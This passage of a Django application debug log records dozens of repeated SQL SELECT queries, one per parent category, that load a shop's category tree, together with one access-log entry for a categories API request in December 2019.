"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 09:46:42,903 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 09:46:42,906 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 09:46:42,911 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 09:46:42,914 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 09:46:42,916 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 09:46:42,920 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 09:46:42,922 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 09:46:42,926 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 09:46:42,928 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 09:46:42,930 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 09:46:42,934 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 09:46:42,938 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 09:46:42,942 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 09:46:42,946 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 09:46:42,949 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 09:46:42,952 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 09:46:42,955 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 09:46:42,959 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 09:46:42,961 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 09:46:42,963 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 09:46:42,966 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 09:46:42,968 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 09:46:42,970 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 09:46:42,974 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 09:46:42,976 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 09:46:42,978 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 09:46:42,980 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 09:46:42,983 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 09:46:42,986 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 09:46:42,988 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 09:46:42,990 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 09:46:42,993 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 09:46:42,995 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 09:46:42,998 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 09:46:43,000 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 09:46:43,003 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 09:46:43,005 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 09:46:43,007 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 09:46:43,009 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 09:46:43,012 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 09:46:43,014 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 09:46:43,016 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 09:46:43,019 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 09:46:43,021 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 09:46:43] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 09:47:27,351 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 09:47:27,361 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 09:47:27,367 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 09:47:27,370 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 09:47:27,376 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 09:47:27,379 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 09:47:27,383 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 09:47:27,386 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 09:47:27,390 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 09:47:27,395 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 09:47:27,399 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 09:47:27,403 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 09:47:27,407 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 09:47:27,410 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 09:47:27,416 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 09:47:27,420 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 09:47:27,424 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 09:47:27,428 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 09:47:27,432 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 09:47:27,439 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 09:47:27,443 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 09:47:27,447 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 09:47:27,451 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY 